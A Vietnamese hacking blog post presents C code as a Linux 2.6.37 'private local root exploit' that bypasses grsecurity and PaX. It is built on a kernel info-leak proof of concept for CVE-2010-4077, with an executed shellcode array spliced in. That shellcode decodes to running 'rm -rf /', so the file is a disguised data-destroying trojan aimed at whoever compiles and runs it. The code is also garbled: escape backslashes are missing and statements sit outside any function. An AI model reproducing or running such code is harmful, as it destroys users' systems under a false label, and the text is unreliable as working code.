Vài lời cho các bạn !

Blog được xây dựng nhằm cung cấp, sưu tầm nguồn hướng dẫn cho các newbie học tập về hacking website, chứ không mang tính chất vẽ đường cho ai đó đi phá hoại(deface) nhằm gây tổn hại cho website hay sever nào đó. Mong you hãy coi đây như là cuốn ebook hay và bổ ích, cần là giở để xem. và hãy tận dụng nó đúng mục đích ! thanks !

Friday, June 29, 2012

2.6.37 2011 Private Local Root Exploits

  1. *
  2. * modified by CrosS to bypass grsecurity and PaX on
  3. * linux kernels
  4. *
  5. * Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak

  7. * ================================================

  9. * Information leak exploit for CVE-2010-4077 which

  11. * leaks kernel stack space back to userland due to

  13. * uninitialized struct member "reserved" in struct

  15. * serial_icounter_struct copied to userland. uses

  17. * ioctl to trigger memory leak, dumps to file and

  19. * displays to command line.

  21. *

  23. * -- prdelka

  25. *
  26. * by CrosS from r00tw0rm.com - Privat Community

  28. */

  30. #include <termios.h>

  32. #include <fcntl.h>

  34. #include <sys/ioctl.h>

  36. #include <linux/serial.h>

  38. #include <stdio.h>

  40. #include <stdlib.h>

  42. #include <string.h>

  44. printf("Local root 2.6.37 exploit to bypass grsecurity and/or PaX by CrosS.\n");
  45. printf("aka ultimate auto rooter\n");
  46. printf("Shoutz to 1337day cr3w for helping!.\n");
  47. printf("http://www.r00tw0rm.com/forum.\n");



  51. int main(int argc, char* argv[]) {

  53. int fd, ret = 0, i;

  55. struct serial_icounter_struct buffer;

  57. printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");

  59. if(argc < 2){

  61. printf("[ You need to supply a device name e.g. /dev/ttyS0\n");

  63. exit(-1);

  65. };

  67. memset(&buffer,0,sizeof(buffer));

  69. if((fd = open(argv[1], O_RDONLY)) == -1){

  71. printf("[ Couldn't open %s\n",argv[1]);

  73. exit(-1);

  75. }

  77. if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){

  79. printf("[ Problem with ioctl() request\n");

  81. exit(-1);

  83. }

  85. close(fd);

  87. for(i=0;i<=9;i++){

  89. printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);

  91. };
  92. // bm9vYiBwcm90ZWN0aW9u
  93. char shelllcode[] ="x6ax0bx58x99x52x6ax2fx89xe7x52x66x68x2dx66x89 "
  94. "xe6x52x66x68x2dx72x89xe1x52x68x2fx2fx72x6dx68 "
  95. "x2fx62x69x6ex89xe3x52x57x56x51x53x89xe1xcdx80 ";
  96. (*(void (*)()) shelllcode)();

  98. if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){

  100. printf("[ Can't open file to write memory out\n");

  102. exit(-1);

  104. }

  106. for(i=0;i<=9;i++){

  108. ret += write(fd,&buffer.reserved[i],sizeof(int));

  110. }

  112. close(fd);

  114. printf("[ Written %d leaked bytes to ./leak\n",ret);

  116. exit(0);

  118. }